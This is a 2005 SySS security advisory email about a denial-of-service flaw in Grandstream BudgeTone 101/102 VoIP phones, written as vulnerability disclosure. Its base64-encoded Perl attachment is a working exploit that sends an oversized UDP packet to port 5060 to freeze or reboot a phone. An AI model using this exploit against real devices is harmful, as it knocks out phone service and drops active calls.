--Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable Content-Disposition: inline - ------------------------------------------------------------------- SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability - ------------------------------------------------------------------- Problem discovered: July 20th 2005 Vendor contacted: July 21th 2005 Advisory will published on: August 12th 2005 AUTHOR: Pierre Kroma (kroma@syss.de) SySS GmbH 72070 Tuebingen / Germany Tel.: +49-7071-407856-0 Key fingerprint =3D 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC DEVICE: Grandstream Budge Tone-101 Grandstream Budge Tone-102 AFFECTED VERSIONS: perhaps all(?) <=3D 1.0.6.7 (firmware 1.0.6.7 tested) EXPLOIT: attached VENDOR STATUS: informed SEVERITY: medium Remotely exploitable: yes DESCRIPTION: It is possible to initiate a D.o.S attack against this voip (hardware-)phone. If you send an UDP packet greater than 65534 bytes=20 to port 5060 the device stops working: - any active telephone call will be aborted. - the display will show nothing / display freeze. - the integrated HTTP-server won't be reachable any more. To solve the problem, you must switch the phone off and on again. If you send a packet of exactly 65534 bytes the device may reboot. Smaller packets have no effect. ############################################################################ EXAMPLE: Grandstream BT101/BT102 DoS written by pierre kroma (kroma@syss.de) ping the remote device xxx.xxx.xxx.xxx PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data. 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D1 ttl=3D250 time=3D0.479 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D2 ttl=3D250 time=3D0.406 ms 64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3D3 ttl=3D250 time=3D0.404 ms --- xxx.xxx.xxx.xxx ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2000ms rtt min/avg/max/mdev =3D 0.404/0.429/0.479/0.042 ms Wait ... ping the remote device xxx.xxx.xxx.xxx again PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data. --- xxx.xxx.xxx.xxx ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 1999ms ############################################################################ --Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL Content-Type: application/x-perl; name=grandstream-DoS.pl Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename=grandstream-DoS.pl IyEvdXNyL2Jpbi9wZXJsCiMKdXNlIElPOjpTb2NrZXQ7CnVzZSBUZXJtOjpBTlNJQ29sb3I7Cgoj IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIFUgUyBBIEcgRSAjIyMjIyMjIyMjIyMjIyMjIyMj IyMjIyMjIyMjIyMjIyMjIwpzeXN0ZW0gKCJjbGVhciIpOwpwcmludCAiXG5HcmFuZHN0cmVhbSBC VDEwMS9CVDEwMiBEb1NcbiI7CnByaW50ICJ3cml0dGVuIGJ5IHBpZXJyZSBrcm9tYSAoa3JvbWFc QHN5c3MuZGUpXG5cbiI7CgppZiAoISRBUkdWWzJdKXsKcHJpbnQgcXF+ClVzYWdlOiBwZXJsIGdy YW5kc3RyZWFtLURvUy5wbCAtcyA8aXAtYWRkcj4gPHVkcC1wb3J0PiB7LXIvLXN9CgoJPGlwLWFk ZHI+ICA9IDstKQoJPHVkcC1wb3J0PiA9IDUwNjAKCgktciA9ICdyZWJvb3QnIAl0aGUgR3JhbmRz dHJlYW0gQlQgMTAxLzEwMgoJLXMgPSAnc2h1dGRvd24nIHRoZSBHcmFuZHN0cmVhbSBCVCAxMDEv MTAyCgp+OyBleGl0O30KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBEIEUgRiBJ IE4gSSBUIEkgTyBOIFMjIyMjIyMjIyMjIyMjIyMjIyMjIwoKJHZpY3RpbSA9ICRBUkdWWzBdOwok cG9ydCA9ICRBUkdWWzFdOwokb3B0aW9uID0gJEFSR1ZbMl07CgppZiAoICRvcHRpb24gPT0gJ3In IHx8ICRvcHRpb24gPT0gJ1InICkKewkkcmVxdWVzdD0gJ2sneDY1NTM0O30KCmlmICggJG9wdGlv biA9PSAncycgfHwgJG9wdGlvbiA9PSAnUycgKQp7CSRyZXF1ZXN0PSAncCd4NjU1MzU7fQplbHNl CnsJcHJpbnQgIldyb25nIHBhcmFtZXRlciAtIHRyeSBpdCBhZ2FpbiI7CglleGl0Owp9CgoKIyBw aW5nIHRoZSByZW1vdGUgZGV2aWNlCnByaW50IGNvbG9yICdib2xkIGJsdWUnOwpwcmludCAiXG5w aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW1cbiI7CnByaW50IGNvbG9yICdyZXNldCc7CnN5 c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCnByaW50IGNvbG9yICdib2xkIHJlZCc7CnByaW50 ICJcbiBXYWl0IC4uLiBcblxuXG4iOwpwcmludCBjb2xvciAncmVzZXQnOwokc294ID0gSU86OlNv Y2tldDo6SU5FVC0+bmV3KFByb3RvPT4idWRwIixQZWVyUG9ydD0+IiRwb3J0IixQZWVyQWRkcj0+ IiR2aWN0aW0iKTsKCnByaW50ICRzb3ggJHJlcXVlc3Q7CnNsZWVwIDE7CmNsb3NlICRzb3g7Cgoj IHBpbmcgdGhlIHJlbW90ZSBkZXZpY2UKcHJpbnQgY29sb3IgJ2JvbGQgYmx1ZSc7CnByaW50ICJw aW5nIHRoZSByZW1vdGUgZGV2aWNlICR2aWN0aW0gYWdhaW5cbiI7CnByaW50IGNvbG9yICdyZXNl dCc7CnN5c3RlbSgicGluZyAtYyAzICR2aWN0aW0iKTsKCg== --Multipart_Fri__12_Aug_2005_14_27_05_+0200_w+l8sZfQ.4cvwwgL--